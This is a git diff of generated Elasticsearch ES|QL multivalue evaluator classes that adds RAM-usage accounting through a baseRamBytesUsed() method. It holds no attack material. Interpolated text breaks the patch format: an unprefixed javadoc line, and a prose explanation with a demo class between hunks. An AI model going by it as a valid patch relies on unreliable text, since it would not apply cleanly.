index c23d036550fc8..6913eead04224 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAppendLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvAppendLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAppendLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field1; @@ -47,6 +50,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field1.baseRamBytesUsed(); + baseRamBytesUsed += field2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock field1Block, LongBlock field2Block) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java index b0a99ab33320d..7bde59981be88 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. 
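+ * <p>This class extends {@code AbstractMultivalueFunction.AbstractEvaluator}, which already owns the {@code field} child, so the new {@code baseRamBytesUsed()} is simply the shallow class size plus {@code field.baseRamBytesUsed()}.</p>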
*/ public final class MvAvgDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgDoubleEvaluator.class); + public MvAvgDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -79,6 +82,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java index abc2157d30d03..cc866d986258c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgIntEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvAvgIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgIntEvaluator.class); + public MvAvgIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -138,6 +141,11 @@ public Block evalSingleValuedNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java index b323f92b3b02f..c24a5cbf80a49 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. 
  */
 public final class MvAvgLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgLongEvaluator.class);
+
   public MvAvgLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -138,6 +141,11 @@ public Block evalSingleValuedNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java
index f12634f721c94..f24cc64b2f2d6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvAvgUnsignedLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -19,6 +20,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvAvgUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvAvgUnsignedLongEvaluator.class);
+
   public MvAvgUnsignedLongEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -139,6 +142,11 @@ public Block evalSingleValuedNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
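RamUsageEstimator.shallowSizeOfInstance does the per-class half of this accounting: it reflects over the class layout once and returns the byte size of a single instance's header and fields, ignoring anything those fields reference. That is why each generated class can cache the result in a static final. A small demonstration with a hypothetical Node class (not from this diff):

import org.apache.lucene.util.RamUsageEstimator;

public class ShallowSizeDemo {
  // The shallow size counts the object header, the int, and two object
  // pointers, not the objects those pointers lead to.
  static final class Node {
    Object left;
    Object right;
    int depth;
  }

  public static void main(String[] args) {
    // Reflection runs once here; real callers cache this in a static final,
    // exactly as the generated evaluators do with BASE_RAM_BYTES_USED.
    System.out.println("shallow bytes per Node: "
        + RamUsageEstimator.shallowSizeOfInstance(Node.class));
  }
}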
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java
index 72cc92114d9a5..0898dabd42c71 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvFirstBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstBooleanEvaluator.class);
+
   public MvFirstBooleanEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java
index d0bcfda7a4209..bfeba5f9bc1b3 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstBytesRefEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -18,6 +19,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvFirstBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstBytesRefEvaluator.class);
+
   public MvFirstBytesRefEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -72,6 +75,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java
index d38ec51990ac0..6c1d1c1d1a9d8 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvFirstDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstDoubleEvaluator.class);
+
   public MvFirstDoubleEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java
index 7cb6e53326b7a..27877b6b83ff3 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvFirstIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstIntEvaluator.class);
+
   public MvFirstIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java
index 3a34c55940248..da3e55b1592cf 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvFirstLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvFirstLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvFirstLongEvaluator.class);
+
   public MvFirstLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java
index 08022d6580ebf..440c31b2d0fdd 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvLastBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastBooleanEvaluator.class);
+
   public MvLastBooleanEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java
index 29c5e19aee827..8c85491c80e66 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastBytesRefEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -18,6 +19,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvLastBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastBytesRefEvaluator.class);
+
   public MvLastBytesRefEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -72,6 +75,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java
index b4f5c8d147f03..4c493543a2725 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvLastDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastDoubleEvaluator.class);
+
   public MvLastDoubleEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -69,6 +72,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java
index d43e11571102f..3c5a58b9db96e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvLastIntEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastIntEvaluator.class);
+
   public MvLastIntEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java
index 897f7e513aebb..990bf7db24f9b 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvLastLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvLastLongEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvLastLongEvaluator.class);
+
   public MvLastLongEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -68,6 +71,11 @@ public Block evalNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java
index 2b7decc4c5537..598525507fa11 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMaxBooleanEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxBooleanEvaluator.class);
+
   public MvMaxBooleanEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -125,6 +128,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java
index ed90337cb1947..41c5958836b94 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxBytesRefEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -18,6 +19,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMaxBytesRefEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxBytesRefEvaluator.class);
+
   public MvMaxBytesRefEvaluator(EvalOperator.ExpressionEvaluator field,
       DriverContext driverContext) {
     super(driverContext, field);
@@ -134,6 +137,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java
index 9fcce8e6c6538..bfab8ec5f970e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvMaxDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -17,6 +18,8 @@
  * This class is generated. Edit {@code MvEvaluatorImplementer} instead.
  */
 public final class MvMaxDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvMaxDoubleEvaluator.class);
+
   public MvMaxDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) {
     super(driverContext, field);
   }
@@ -124,6 +127,11 @@ private Block evalAscendingNotNullable(Block fieldVal) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    return BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
 
     private final EvalOperator.ExpressionEvaluator.Factory field;
